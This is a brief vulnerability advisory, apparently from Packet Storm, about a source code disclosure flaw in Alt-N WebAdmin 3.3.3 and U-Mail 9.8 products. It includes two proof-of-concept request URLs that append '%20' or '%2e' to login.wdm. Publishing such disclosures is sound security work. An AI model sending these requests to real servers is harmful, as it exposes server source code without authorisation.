Alt-N WebAdmin version 3.3.3 suffers from a remote source code disclosure vulnerability. Also affected is U-Mail for Windows version 9.8 and U-Mail GateWay for Windows version 9.8.
463f4e8bc5d27ae0d0f91b4239888aabb80818473f98de5f45f4248aebf01d9cVulnerable: v3.3.3
Vendor: www.altn.com
Category: Environment Error
Vulnerable
========
Alt-N WebAdmin 3.3.3
U-Mail for Windows V9.8
U-Mail GateWay for Windows V9.8
Details:
=========
A source code disclosure vulnerability exists with Alt-N WebAdmin Server.
Remote attacker can be exploited to disclose the source code by appending "%2e" or "%20" to a URI.
Test on U-Mail for Windows V9.8 and U-Mail GateWay for Windows V9.8
POC:
=========
http://ip:1000/login.wdm%20
http://ip:1000/login.wdm%2e
Reference:
=========
www.comingchina.com/download.html
http://www.nansec.com/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed